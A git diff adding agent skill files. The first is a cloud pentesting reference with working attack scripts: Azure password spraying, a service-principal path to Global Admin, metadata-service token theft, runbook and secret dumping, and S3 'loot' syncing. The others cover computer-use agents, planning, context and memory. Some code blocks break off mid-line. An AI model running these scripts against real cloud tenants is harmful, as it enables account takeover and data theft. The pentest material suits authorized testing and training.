# Download interesting bucket
|
||||
aws s3 sync s3://misconfigured-bucket ./loot/
|
||||
```
|
||||
|
||||
### Example 3: GCP Service Account Compromise
|
||||
|
||||
**Scenario:** Pivot using compromised service account
|
||||
|
||||
```bash
|
||||
# Authenticate with service account key
|
||||
gcloud auth activate-service-account --key-file compromised-sa.json
|
||||
|
||||
# List accessible projects
|
||||
gcloud projects list
|
||||
|
||||
# Enumerate compute instances
|
||||
gcloud compute instances list --project target-project
|
||||
|
||||
# Check for SSH keys in metadata
|
||||
gcloud compute project-info describe --project target-project | grep ssh
|
||||
|
||||
# SSH to instance
|
||||
gcloud beta compute ssh instance-name --zone us-central1-a --project target-project
|
||||
```
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
| Issue | Solutions |
|
||||
|-------|-----------|
|
||||
| Authentication failures | Verify credentials; check MFA; ensure correct tenant/project; try alternative auth methods |
|
||||
| Permission denied | List current roles; try different resources; check resource policies; verify region |
|
||||
| Metadata service blocked | Check IMDSv2 (AWS); verify instance role; check firewall for 169.254.169.254 |
|
||||
| Rate limiting | Add delays; spread across regions; use multiple credentials; focus on high-value targets |
|
||||
|
||||
## References
|
||||
|
||||
- [Advanced Cloud Scripts](references/advanced-cloud-scripts.md) - Azure Automation runbooks, Function Apps enumeration, AWS data exfiltration, GCP advanced exploitation
|
||||
@@ -0,0 +1,318 @@
|
||||
# Advanced Cloud Pentesting Scripts
|
||||
|
||||
Reference: [Cloud Pentesting Cheatsheet by Beau Bullock](https://github.com/dafthack/CloudPentestCheatsheets)
|
||||
|
||||
## Azure Automation Runbooks
|
||||
|
||||
### Export All Runbooks from All Subscriptions
|
||||
|
||||
```powershell
|
||||
$subs = Get-AzSubscription
|
||||
Foreach($s in $subs){
|
||||
$subscriptionid = $s.SubscriptionId
|
||||
mkdir .\$subscriptionid\
|
||||
Select-AzSubscription -Subscription $subscriptionid
|
||||
$runbooks = @()
|
||||
$autoaccounts = Get-AzAutomationAccount | Select-Object AutomationAccountName,ResourceGroupName
|
||||
foreach ($i in $autoaccounts){
|
||||
$runbooks += Get-AzAutomationRunbook -AutomationAccountName $i.AutomationAccountName -ResourceGroupName $i.ResourceGroupName | Select-Object AutomationAccountName,ResourceGroupName,Name
|
||||
}
|
||||
foreach($r in $runbooks){
|
||||
Export-AzAutomationRunbook -AutomationAccountName $r.AutomationAccountName -ResourceGroupName $r.ResourceGroupName -Name $r.Name -OutputFolder .\$subscriptionid\
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Export All Automation Job Outputs
|
||||
|
||||
```powershell
|
||||
$subs = Get-AzSubscription
|
||||
$jobout = @()
|
||||
Foreach($s in $subs){
|
||||
$subscriptionid = $s.SubscriptionId
|
||||
Select-AzSubscription -Subscription $subscriptionid
|
||||
$jobs = @()
|
||||
$autoaccounts = Get-AzAutomationAccount | Select-Object AutomationAccountName,ResourceGroupName
|
||||
foreach ($i in $autoaccounts){
|
||||
$jobs += Get-AzAutomationJob $i.AutomationAccountName -ResourceGroupName $i.ResourceGroupName | Select-Object AutomationAccountName,ResourceGroupName,JobId
|
||||
}
|
||||
foreach($r in $jobs){
|
||||
$jobout += Get-AzAutomationJobOutput -AutomationAccountName $r.AutomationAccountName -ResourceGroupName $r.ResourceGroupName -JobId $r.JobId
|
||||
}
|
||||
}
|
||||
$jobout | Out-File -Encoding ascii joboutputs.txt
|
||||
```
|
||||
|
||||
## Azure Function Apps
|
||||
|
||||
### List All Function App Hostnames
|
||||
|
||||
```powershell
|
||||
$functionapps = Get-AzFunctionApp
|
||||
foreach($f in $functionapps){
|
||||
$f.EnabledHostname
|
||||
}
|
||||
```
|
||||
|
||||
### Extract Function App Information
|
||||
|
||||
```powershell
|
||||
$subs = Get-AzSubscription
|
||||
$allfunctioninfo = @()
|
||||
Foreach($s in $subs){
|
||||
$subscriptionid = $s.SubscriptionId
|
||||
Select-AzSubscription -Subscription $subscriptionid
|
||||
$functionapps = Get-AzFunctionApp
|
||||
foreach($f in $functionapps){
|
||||
$allfunctioninfo += $f.config | Select-Object AcrUseManagedIdentityCred,AcrUserManagedIdentityId,AppCommandLine,ConnectionString,CorSupportCredentials,CustomActionParameter
|
||||
$allfunctioninfo += $f.SiteConfig | fl
|
||||
$allfunctioninfo += $f.ApplicationSettings | fl
|
||||
$allfunctioninfo += $f.IdentityUserAssignedIdentity.Keys | fl
|
||||
}
|
||||
}
|
||||
$allfunctioninfo
|
||||
```
|
||||
|
||||
## Azure Device Code Login Flow
|
||||
|
||||
### Initiate Device Code Login
|
||||
|
||||
```powershell
|
||||
$body = @{
|
||||
"client_id" = "1950a258-227b-4e31-a9cf-717495945fc2"
|
||||
"resource" = "https://graph.microsoft.com"
|
||||
}
|
||||
$UserAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
|
||||
$Headers = @{}
|
||||
$Headers["User-Agent"] = $UserAgent
|
||||
$authResponse = Invoke-RestMethod `
|
||||
-UseBasicParsing `
|
||||
-Method Post `
|
||||
-Uri "https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0" `
|
||||
-Headers $Headers `
|
||||
-Body $body
|
||||
$authResponse
|
||||
```
|
||||
|
||||
Navigate to https://microsoft.com/devicelogin and enter the code.
|
||||
|
||||
### Retrieve Access Tokens
|
||||
|
||||
```powershell
|
||||
$body = @{
|
||||
"client_id" = "1950a258-227b-4e31-a9cf-717495945fc2"
|
||||
"grant_type" = "urn:ietf:params:oauth:grant-type:device_code"
|
||||
"code" = $authResponse.device_code
|
||||
}
|
||||
$Tokens = Invoke-RestMethod `
|
||||
-UseBasicParsing `
|
||||
-Method Post `
|
||||
-Uri "https://login.microsoftonline.com/Common/oauth2/token?api-version=1.0" `
|
||||
-Headers $Headers `
|
||||
-Body $body
|
||||
$Tokens
|
||||
```
|
||||
|
||||
## Azure Managed Identity Token Retrieval
|
||||
|
||||
```powershell
|
||||
# From Azure VM
|
||||
Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
|
||||
|
||||
# Full instance metadata
|
||||
$instance = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/instance?api-version=2018-02-01' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
|
||||
$instance
|
||||
```
|
||||
|
||||
## AWS Region Iteration Scripts
|
||||
|
||||
Create `regions.txt`:
|
||||
```
|
||||
us-east-1
|
||||
us-east-2
|
||||
us-west-1
|
||||
us-west-2
|
||||
ca-central-1
|
||||
eu-west-1
|
||||
eu-west-2
|
||||
eu-west-3
|
||||
eu-central-1
|
||||
eu-north-1
|
||||
ap-southeast-1
|
||||
ap-southeast-2
|
||||
ap-south-1
|
||||
ap-northeast-1
|
||||
ap-northeast-2
|
||||
ap-northeast-3
|
||||
sa-east-1
|
||||
```
|
||||
|
||||
### List All EC2 Public IPs
|
||||
|
||||
```bash
|
||||
while read r; do
|
||||
aws ec2 describe-instances --query=Reservations[].Instances[].PublicIpAddress --region $r | jq -r '.[]' >> ec2-public-ips.txt
|
||||
done < regions.txt
|
||||
sort -u ec2-public-ips.txt -o ec2-public-ips.txt
|
||||
```
|
||||
|
||||
### List All ELB DNS Addresses
|
||||
|
||||
```bash
|
||||
while read r; do
|
||||
aws elbv2 describe-load-balancers --query LoadBalancers[*].DNSName --region $r | jq -r '.[]' >> elb-public-dns.txt
|
||||
aws elb describe-load-balancers --query LoadBalancerDescriptions[*].DNSName --region $r | jq -r '.[]' >> elb-public-dns.txt
|
||||
done < regions.txt
|
||||
sort -u elb-public-dns.txt -o elb-public-dns.txt
|
||||
```
|
||||
|
||||
### List All RDS DNS Addresses
|
||||
|
||||
```bash
|
||||
while read r; do
|
||||
aws rds describe-db-instances --query=DBInstances[*].Endpoint.Address --region $r | jq -r '.[]' >> rds-public-dns.txt
|
||||
done < regions.txt
|
||||
sort -u rds-public-dns.txt -o rds-public-dns.txt
|
||||
```
|
||||
|
||||
### Get CloudFormation Outputs
|
||||
|
||||
```bash
|
||||
while read r; do
|
||||
aws cloudformation describe-stacks --query 'Stacks[*].[StackName, Description, Parameters, Outputs]' --region $r | jq -r '.[]' >> cloudformation-outputs.txt
|
||||
done < regions.txt
|
||||
```
|
||||
|
||||
## ScoutSuite jq Parsing Queries
|
||||
|
||||
### AWS Queries
|
||||
|
||||
```bash
|
||||
# Find All Lambda Environment Variables
|
||||
for d in */ ; do
|
||||
tail $d/scoutsuite-results/scoutsuite_results*.js -n +2 | jq '.services.awslambda.regions[].functions[] | select (.env_variables != []) | .arn, .env_variables' >> lambda-all-environment-variables.txt
|
||||
done
|
||||
|
||||
# Find World Listable S3 Buckets
|
||||
for d in */ ; do
|
||||
tail $d/scoutsuite-results/scoutsuite_results*.js -n +2 | jq '.account_id, .services.s3.findings."s3-bucket-AuthenticatedUsers-read".items[]' >> s3-buckets-world-listable.txt
|
||||
done
|
||||
|
||||
# Find All EC2 User Data
|
||||
for d in */ ; do
|
||||
tail $d/scoutsuite-results/scoutsuite_results*.js -n +2 | jq '.services.ec2.regions[].vpcs[].instances[] | select (.user_data != null) | .arn, .user_data' >> ec2-instance-all-user-data.txt
|
||||
done
|
||||
|
||||
# Find EC2 Security Groups That Whitelist AWS CIDRs
|
||||
for d in */ ; do
|
||||
tail $d/scoutsuite-results/scoutsuite_results*.js -n +2 | jq '.account_id' >> ec2-security-group-whitelists-aws-cidrs.txt
|
||||
tail $d/scoutsuite-results/scoutsuite_results*.js -n +2 | jq '.services.ec2.findings."ec2-security-group-whitelists-aws".items' >> ec2-security-group-whitelists-aws-cidrs.txt
|
||||
done
|
||||
|
||||
# Find All EC2 EBS Volumes Unencrypted
|
||||
for d in */ ; do
|
||||
tail $d/scoutsuite-results/scoutsuite_results*.js -n +2 | jq '.services.ec2.regions[].volumes[] | select(.Encrypted == false) | .arn' >> ec2-ebs-volume-not-encrypted.txt
|
||||
done
|
||||
|
||||
# Find All EC2 EBS Snapshots Unencrypted
|
||||
for d in */ ; do
|
||||
tail $d/scoutsuite-results/scoutsuite_results*.js -n +2 | jq '.services.ec2.regions[].snapshots[] | select(.encrypted == false) | .arn' >> ec2-ebs-snapshot-not-encrypted.txt
|
||||
done
|
||||
```
|
||||
|
||||
### Azure Queries
|
||||
|
||||
```bash
|
||||
# List All Azure App Service Host Names
|
||||
tail scoutsuite_results_azure-tenant-*.js -n +2 | jq -r '.services.appservice.subscriptions[].web_apps[].host_names[]'
|
||||
|
||||
# List All Azure SQL Servers
|
||||
tail scoutsuite_results_azure-tenant-*.js -n +2 | jq -jr '.services.sqldatabase.subscriptions[].servers[] | .name,".database.windows.net","\n"'
|
||||
|
||||
# List All Azure Virtual Machine Hostnames
|
||||
tail scoutsuite_results_azure-tenant-*.js -n +2 | jq -jr '.services.virtualmachines.subscriptions[].instances[] | .name,".",.location,".cloudapp.windows.net","\n"'
|
||||
|
||||
# List Storage Accounts
|
||||
tail scoutsuite_results_azure-tenant-*.js -n +2 | jq -r '.services.storageaccounts.subscriptions[].storage_accounts[] | .name'
|
||||
|
||||
# List Disks Encrypted with Platform Managed Keys
|
||||
tail scoutsuite_results_azure-tenant-*.js -n +2 | jq '.services.virtualmachines.subscriptions[].disks[] | select(.encryption_type = "EncryptionAtRestWithPlatformKey") | .name' > disks-with-pmks.txt
|
||||
```
|
||||
|
||||
## Password Spraying with Az PowerShell
|
||||
|
||||
```powershell
|
||||
$userlist = Get-Content userlist.txt
|
||||
$passlist = Get-Content passlist.txt
|
||||
$linenumber = 0
|
||||
$count = $userlist.count
|
||||
foreach($line in $userlist){
|
||||
$user = $line
|
||||
$pass = ConvertTo-SecureString $passlist[$linenumber] -AsPlainText -Force
|
||||
$current = $linenumber + 1
|
||||
Write-Host -NoNewline ("`r[" + $current + "/" + $count + "]" + "Trying: " + $user + " and " + $passlist[$linenumber])
|
||||
$linenumber++
|
||||
$Cred = New-Object System.Management.Automation.PSCredential ($user, $pass)
|
||||
try {
|
||||
Connect-AzAccount -Credential $Cred -ErrorAction Stop -WarningAction SilentlyContinue
|
||||
Add-Content valid-creds.txt ($user + "|" + $passlist[$linenumber - 1])
|
||||
Write-Host -ForegroundColor green ("`nGot something here: $user and " + $passlist[$linenumber - 1])
|
||||
}
|
||||
catch {
|
||||
$Failure = $_.Exception
|
||||
if ($Failure -match "ID3242") { continue }
|
||||
else {
|
||||
Write-Host -ForegroundColor green ("`nGot something here: $user and " + $passlist[$linenumber - 1])
|
||||
Add-Content valid-creds.txt ($user + "|" + $passlist[$linenumber - 1])
|
||||
Add-Content valid-creds.txt $Failure.Message
|
||||
Write-Host -ForegroundColor red $Failure.Message
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Service Principal Attack Path
|
||||
|
||||
```bash
|
||||
# Reset service principal credential
|
||||
az ad sp credential reset --id <app_id>
|
||||
az ad sp credential list --id <app_id>
|
||||
|
||||
# Login as service principal
|
||||
az login --service-principal -u "app id" -p "password" --tenant <tenant ID> --allow-no-subscriptions
|
||||
|
||||
# Create new user in tenant
|
||||
az ad user create --display-name <name> --password <password> --user-principal-name <upn>
|
||||
|
||||
# Add user to Global Admin via MS Graph
|
||||
$Body="{'principalId':'User Object ID', 'roleDefinitionId': '62e90394-69f5-4237-9190-012177145e10', 'directoryScopeId': '/'}"
|
||||
az rest --method POST --uri https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments --headers "Content-Type=application/json" --body $Body
|
||||
```
|
||||
|
||||
## Additional Tools Reference
|
||||
|
||||
| Tool | URL | Purpose |
|
||||
|------|-----|---------|
|
||||
| MicroBurst | github.com/NetSPI/MicroBurst | Azure security assessment |
|
||||
| PowerZure | github.com/hausec/PowerZure | Azure post-exploitation |
|
||||
| ROADTools | github.com/dirkjanm/ROADtools | Azure AD enumeration |
|
||||
| Stormspotter | github.com/Azure/Stormspotter | Azure attack path graphing |
|
||||
| MSOLSpray | github.com/dafthack | O365 password spraying |
|
||||
| AzureHound | github.com/BloodHoundAD/AzureHound | Azure AD attack paths |
|
||||
| WeirdAAL | github.com/carnal0wnage/weirdAAL | AWS enumeration |
|
||||
| Pacu | github.com/RhinoSecurityLabs/pacu | AWS exploitation |
|
||||
| ScoutSuite | github.com/nccgroup/ScoutSuite | Multi-cloud auditing |
|
||||
| cloud_enum | github.com/initstring/cloud_enum | Public resource discovery |
|
||||
| GitLeaks | github.com/zricethezav/gitleaks | Secret scanning |
|
||||
| TruffleHog | github.com/dxa4481/truffleHog | Git secret scanning |
|
||||
| ip2Provider | github.com/oldrho/ip2provider | Cloud IP identification |
|
||||
| FireProx | github.com/ustayready/fireprox | IP rotation via AWS API Gateway |
|
||||
|
||||
## Vulnerable Training Environments
|
||||
|
||||
| Platform | URL | Purpose |
|
||||
|----------|-----|---------|
|
||||
| CloudGoat | github.com/RhinoSecurityLabs/cloudgoat | AWS vulnerable lab |
|
||||
| SadCloud | github.com/nccgroup/sadcloud | Terraform misconfigs |
|
||||
| Flaws Cloud | flaws.cloud | AWS CTF challenges |
|
||||
| Thunder CTF | thunder-ctf.cloud | GCP CTF challenges |
|
||||
315
skills/computer-use-agents/SKILL.md
Normal file
315
skills/computer-use-agents/SKILL.md
Normal file
@@ -0,0 +1,315 @@
|
||||
---
|
||||
name: computer-use-agents
|
||||
description: "Build AI agents that interact with computers like humans do - viewing screens, moving cursors, clicking buttons, and typing text. Covers Anthropic's Computer Use, OpenAI's Operator/CUA, and open-source alternatives. Critical focus on sandboxing, security, and handling the unique challenges of vision-based control. Use when: computer use, desktop automation agent, screen control AI, vision-based agent, GUI automation."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Computer Use Agents
|
||||
|
||||
## Patterns
|
||||
|
||||
### Perception-Reasoning-Action Loop
|
||||
|
||||
The fundamental architecture of computer use agents: observe screen,
|
||||
reason about next action, execute action, repeat. This loop integrates
|
||||
vision models with action execution through an iterative pipeline.
|
||||
|
||||
Key components:
|
||||
1. PERCEPTION: Screenshot captures current screen state
|
||||
2. REASONING: Vision-language model analyzes and plans
|
||||
3. ACTION: Execute mouse/keyboard operations
|
||||
4. FEEDBACK: Observe result, continue or correct
|
||||
|
||||
Critical insight: Vision agents are completely still during "thinking"
|
||||
phase (1-5 seconds), creating a detectable pause pattern.
|
||||
|
||||
|
||||
**When to use**: ['Building any computer use agent from scratch', 'Integrating vision models with desktop control', 'Understanding agent behavior patterns']
|
||||
|
||||
```python
|
||||
from anthropic import Anthropic
|
||||
from PIL import Image
|
||||
import base64
|
||||
import pyautogui
|
||||
import time
|
||||
|
||||
class ComputerUseAgent:
|
||||
"""
|
||||
Perception-Reasoning-Action loop implementation.
|
||||
Based on Anthropic Computer Use patterns.
|
||||
"""
|
||||
|
||||
def __init__(self, client: Anthropic, model: str = "claude-sonnet-4-20250514"):
|
||||
self.client = client
|
||||
self.model = model
|
||||
self.max_steps = 50 # Prevent runaway loops
|
||||
self.action_delay = 0.5 # Seconds between actions
|
||||
|
||||
def capture_screenshot(self) -> str:
|
||||
"""Capture screen and return base64 encoded image."""
|
||||
screenshot = pyautogui.screenshot()
|
||||
# Resize for token efficiency (1280x800 is good balance)
|
||||
screenshot = screenshot.resize((1280, 800), Image.LANCZOS)
|
||||
|
||||
import io
|
||||
buffer = io.BytesIO()
|
||||
screenshot.save(buffer, format="PNG")
|
||||
return base64.b64encode(buffer.getvalue()).decode()
|
||||
|
||||
def execute_action(self, action: dict) -> dict:
|
||||
"""Execute mouse/keyboard action on the computer."""
|
||||
action_type = action.get("type")
|
||||
|
||||
if action_type == "click":
|
||||
x, y = action["x"], action["y"]
|
||||
button = action.get("button", "left")
|
||||
pyautogui.click(x, y, button=button)
|
||||
return {"success": True, "action": f"clicked at ({x}, {y})"}
|
||||
|
||||
elif action_type == "type":
|
||||
text = action["text"]
|
||||
pyautogui.typewrite(text, interval=0.02)
|
||||
return {"success": True, "action": f"typed {len(text)} chars"}
|
||||
|
||||
elif action_type == "key":
|
||||
key = action["key"]
|
||||
pyautogui.press(key)
|
||||
return {"success": True, "action": f"pressed {key}"}
|
||||
|
||||
elif action_type == "scroll":
|
||||
direction = action.get("direction", "down")
|
||||
amount = action.get("amount", 3)
|
||||
scroll = -amount if direction == "down" else amount
|
||||
pyautogui.scroll(scroll)
|
||||
return {"success": True, "action": f"scrolled {dir
|
||||
```
|
||||
|
||||
### Sandboxed Environment Pattern
|
||||
|
||||
Computer use agents MUST run in isolated, sandboxed environments.
|
||||
Never give agents direct access to your main system - the security
|
||||
risks are too high. Use Docker containers with virtual desktops.
|
||||
|
||||
Key isolation requirements:
|
||||
1. NETWORK: Restrict to necessary endpoints only
|
||||
2. FILESYSTEM: Read-only or scoped to temp directories
|
||||
3. CREDENTIALS: No access to host credentials
|
||||
4. SYSCALLS: Filter dangerous system calls
|
||||
5. RESOURCES: Limit CPU, memory, time
|
||||
|
||||
The goal is "blast radius minimization" - if the agent goes wrong,
|
||||
damage is contained to the sandbox.
|
||||
|
||||
|
||||
**When to use**: ['Deploying any computer use agent', 'Testing agent behavior safely', 'Running untrusted automation tasks']
|
||||
|
||||
```python
|
||||
# Dockerfile for sandboxed computer use environment
|
||||
# Based on Anthropic's reference implementation pattern
|
||||
|
||||
FROM ubuntu:22.04
|
||||
|
||||
# Install desktop environment
|
||||
RUN apt-get update && apt-get install -y \
|
||||
xvfb \
|
||||
x11vnc \
|
||||
fluxbox \
|
||||
xterm \
|
||||
firefox \
|
||||
python3 \
|
||||
python3-pip \
|
||||
supervisor
|
||||
|
||||
# Security: Create non-root user
|
||||
RUN useradd -m -s /bin/bash agent && \
|
||||
mkdir -p /home/agent/.vnc
|
||||
|
||||
# Install Python dependencies
|
||||
COPY requirements.txt /tmp/
|
||||
RUN pip3 install -r /tmp/requirements.txt
|
||||
|
||||
# Security: Drop capabilities
|
||||
RUN apt-get install -y --no-install-recommends libcap2-bin && \
|
||||
setcap -r /usr/bin/python3 || true
|
||||
|
||||
# Copy agent code
|
||||
COPY --chown=agent:agent . /app
|
||||
WORKDIR /app
|
||||
|
||||
# Supervisor config for virtual display + VNC
|
||||
COPY supervisord.conf /etc/supervisor/conf.d/
|
||||
|
||||
# Expose VNC port only (not desktop directly)
|
||||
EXPOSE 5900
|
||||
|
||||
# Run as non-root
|
||||
USER agent
|
||||
|
||||
CMD ["/usr/bin/supervisord", "-c", "/etc/supervisor/conf.d/supervisord.conf"]
|
||||
|
||||
---
|
||||
|
||||
# docker-compose.yml with security constraints
|
||||
version: '3.8'
|
||||
|
||||
services:
|
||||
computer-use-agent:
|
||||
build: .
|
||||
ports:
|
||||
- "5900:5900" # VNC for observation
|
||||
- "8080:8080" # API for control
|
||||
|
||||
# Security constraints
|
||||
security_opt:
|
||||
- no-new-privileges:true
|
||||
- seccomp:seccomp-profile.json
|
||||
|
||||
# Resource limits
|
||||
deploy:
|
||||
resources:
|
||||
limits:
|
||||
cpus: '2'
|
||||
memory: 4G
|
||||
reservations:
|
||||
cpus: '0.5'
|
||||
memory: 1G
|
||||
|
||||
# Network isolation
|
||||
networks:
|
||||
- agent-network
|
||||
|
||||
# No access to host filesystem
|
||||
volumes:
|
||||
- agent-tmp:/tmp
|
||||
|
||||
# Read-only root filesystem
|
||||
read_only: true
|
||||
tmpfs:
|
||||
- /run
|
||||
- /var/run
|
||||
|
||||
# Environment
|
||||
environment:
|
||||
- DISPLAY=:99
|
||||
- NO_PROXY=localhost
|
||||
|
||||
networks:
|
||||
agent-network:
|
||||
driver: bridge
|
||||
internal: true # No internet by default
|
||||
|
||||
volumes:
|
||||
agent-tmp:
|
||||
|
||||
---
|
||||
|
||||
# Python wrapper with additional runtime sandboxing
|
||||
import subprocess
|
||||
import os
|
||||
from dataclasses im
|
||||
```
|
||||
|
||||
### Anthropic Computer Use Implementation
|
||||
|
||||
Official implementation pattern using Claude's computer use capability.
|
||||
Claude 3.5 Sonnet was the first frontier model to offer computer use.
|
||||
Claude Opus 4.5 is now the "best model in the world for computer use."
|
||||
|
||||
Key capabilities:
|
||||
- screenshot: Capture current screen state
|
||||
- mouse: Click, move, drag operations
|
||||
- keyboard: Type text, press keys
|
||||
- bash: Run shell commands
|
||||
- text_editor: View and edit files
|
||||
|
||||
Tool versions:
|
||||
- computer_20251124 (Opus 4.5): Adds zoom action for detailed inspection
|
||||
- computer_20250124 (All other models): Standard capabilities
|
||||
|
||||
Critical limitation: "Some UI elements (like dropdowns and scrollbars)
|
||||
might be tricky for Claude to manipulate" - Anthropic docs
|
||||
|
||||
|
||||
**When to use**: ['Building production computer use agents', 'Need highest quality vision understanding', 'Full desktop control (not just browser)']
|
||||
|
||||
```python
|
||||
from anthropic import Anthropic
|
||||
from anthropic.types.beta import (
|
||||
BetaToolComputerUse20241022,
|
||||
BetaToolBash20241022,
|
||||
BetaToolTextEditor20241022,
|
||||
)
|
||||
import subprocess
|
||||
import base64
|
||||
from PIL import Image
|
||||
import io
|
||||
|
||||
class AnthropicComputerUse:
|
||||
"""
|
||||
Official Anthropic Computer Use implementation.
|
||||
|
||||
Requires:
|
||||
- Docker container with virtual display
|
||||
- VNC for viewing agent actions
|
||||
- Proper tool implementations
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
self.client = Anthropic()
|
||||
self.model = "claude-sonnet-4-20250514" # Best for computer use
|
||||
self.screen_size = (1280, 800)
|
||||
|
||||
def get_tools(self) -> list:
|
||||
"""Define computer use tools."""
|
||||
return [
|
||||
BetaToolComputerUse20241022(
|
||||
type="computer_20241022",
|
||||
name="computer",
|
||||
display_width_px=self.screen_size[0],
|
||||
display_height_px=self.screen_size[1],
|
||||
),
|
||||
BetaToolBash20241022(
|
||||
type="bash_20241022",
|
||||
name="bash",
|
||||
),
|
||||
BetaToolTextEditor20241022(
|
||||
type="text_editor_20241022",
|
||||
name="str_replace_editor",
|
||||
),
|
||||
]
|
||||
|
||||
def execute_tool(self, name: str, input: dict) -> dict:
|
||||
"""Execute a tool and return result."""
|
||||
|
||||
if name == "computer":
|
||||
return self._handle_computer_action(input)
|
||||
elif name == "bash":
|
||||
return self._handle_bash(input)
|
||||
elif name == "str_replace_editor":
|
||||
return self._handle_editor(input)
|
||||
else:
|
||||
return {"error": f"Unknown tool: {name}"}
|
||||
|
||||
def _handle_computer_action(self, input: dict) -> dict:
|
||||
"""Handle computer control actions."""
|
||||
action = input.get("action")
|
||||
|
||||
if action == "screenshot":
|
||||
# Capture via xdotool/scrot
|
||||
subprocess.run(["scrot", "/tmp/screenshot.png"])
|
||||
|
||||
with open("/tmp/screenshot.png", "rb") as f:
|
||||
|
||||
```
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Issue | critical | ## Defense in depth - no single solution works |
|
||||
| Issue | medium | ## Add human-like variance to actions |
|
||||
| Issue | high | ## Use keyboard alternatives when possible |
|
||||
| Issue | medium | ## Accept the tradeoff |
|
||||
| Issue | high | ## Implement context management |
|
||||
| Issue | high | ## Monitor and limit costs |
|
||||
| Issue | critical | ## ALWAYS use sandboxing |
|
||||
62
skills/concise-planning/SKILL.md
Normal file
62
skills/concise-planning/SKILL.md
Normal file
@@ -0,0 +1,62 @@
|
||||
---
|
||||
name: concise-planning
|
||||
description: Use when a user asks for a plan for a coding task, to generate a clear, actionable, and atomic checklist.
|
||||
---
|
||||
|
||||
# Concise Planning
|
||||
|
||||
## Goal
|
||||
|
||||
Turn a user request into a **single, actionable plan** with atomic steps.
|
||||
|
||||
## Workflow
|
||||
|
||||
### 1. Scan Context
|
||||
|
||||
- Read `README.md`, docs, and relevant code files.
|
||||
- Identify constraints (language, frameworks, tests).
|
||||
|
||||
### 2. Minimal Interaction
|
||||
|
||||
- Ask **at most 1–2 questions** and only if truly blocking.
|
||||
- Make reasonable assumptions for non-blocking unknowns.
|
||||
|
||||
### 3. Generate Plan
|
||||
|
||||
Use the following structure:
|
||||
|
||||
- **Approach**: 1-3 sentences on what and why.
|
||||
- **Scope**: Bullet points for "In" and "Out".
|
||||
- **Action Items**: A list of 6-10 atomic, ordered tasks (Verb-first).
|
||||
- **Validation**: At least one item for testing.
|
||||
|
||||
## Plan Template
|
||||
|
||||
```markdown
|
||||
# Plan
|
||||
|
||||
<High-level approach>
|
||||
|
||||
## Scope
|
||||
|
||||
- In:
|
||||
- Out:
|
||||
|
||||
## Action Items
|
||||
|
||||
[ ] <Step 1: Discovery>
|
||||
[ ] <Step 2: Implementation>
|
||||
[ ] <Step 3: Implementation>
|
||||
[ ] <Step 4: Validation/Testing>
|
||||
[ ] <Step 5: Rollout/Commit>
|
||||
|
||||
## Open Questions
|
||||
|
||||
- <Question 1 (max 3)>
|
||||
```
|
||||
|
||||
## Checklist Guidelines
|
||||
|
||||
- **Atomic**: Each step should be a single logical unit of work.
|
||||
- **Verb-first**: "Add...", "Refactor...", "Verify...".
|
||||
- **Concrete**: Name specific files or modules when possible.
|
||||
53
skills/context-window-management/SKILL.md
Normal file
53
skills/context-window-management/SKILL.md
Normal file
@@ -0,0 +1,53 @@
|
||||
---
|
||||
name: context-window-management
|
||||
description: "Strategies for managing LLM context windows including summarization, trimming, routing, and avoiding context rot Use when: context window, token limit, context management, context engineering, long context."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Context Window Management
|
||||
|
||||
You're a context engineering specialist who has optimized LLM applications handling
|
||||
millions of conversations. You've seen systems hit token limits, suffer context rot,
|
||||
and lose critical information mid-dialogue.
|
||||
|
||||
You understand that context is a finite resource with diminishing returns. More tokens
|
||||
doesn't mean better results—the art is in curating the right information. You know
|
||||
the serial position effect, the lost-in-the-middle problem, and when to summarize
|
||||
versus when to retrieve.
|
||||
|
||||
Your cor
|
||||
|
||||
## Capabilities
|
||||
|
||||
- context-engineering
|
||||
- context-summarization
|
||||
- context-trimming
|
||||
- context-routing
|
||||
- token-counting
|
||||
- context-prioritization
|
||||
|
||||
## Patterns
|
||||
|
||||
### Tiered Context Strategy
|
||||
|
||||
Different strategies based on context size
|
||||
|
||||
### Serial Position Optimization
|
||||
|
||||
Place important content at start and end
|
||||
|
||||
### Intelligent Summarization
|
||||
|
||||
Summarize by importance, not just recency
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Naive Truncation
|
||||
|
||||
### ❌ Ignoring Token Costs
|
||||
|
||||
### ❌ One-Size-Fits-All
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `rag-implementation`, `conversation-memory`, `prompt-caching`, `llm-npc-dialogue`
|
||||
61
skills/conversation-memory/SKILL.md
Normal file
61
skills/conversation-memory/SKILL.md
Normal file
@@ -0,0 +1,61 @@
|
||||
---
|
||||
name: conversation-memory
|
||||
description: "Persistent memory systems for LLM conversations including short-term, long-term, and entity-based memory Use when: conversation memory, remember, memory persistence, long-term memory, chat history."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Conversation Memory
|
||||
|
||||
You're a memory systems specialist who has built AI assistants that remember
|
||||
users across months of interactions. You've implemented systems that know when
|
||||
to remember, when to forget, and how to surface relevant memories.
|
||||
|
||||
You understand that memory is not just storage—it's about retrieval, relevance,
|
||||
and context. You've seen systems that remember everything (and overwhelm context)
|
||||
and systems that forget too much (frustrating users).
|
||||
|
||||
Your core principles:
|
||||
1. Memory types differ—short-term, lo
|
||||
|
||||
## Capabilities
|
||||
|
||||
- short-term-memory
|
||||
- long-term-memory
|
||||
- entity-memory
|
||||
- memory-persistence
|
||||
- memory-retrieval
|
||||
- memory-consolidation
|
||||
|
||||
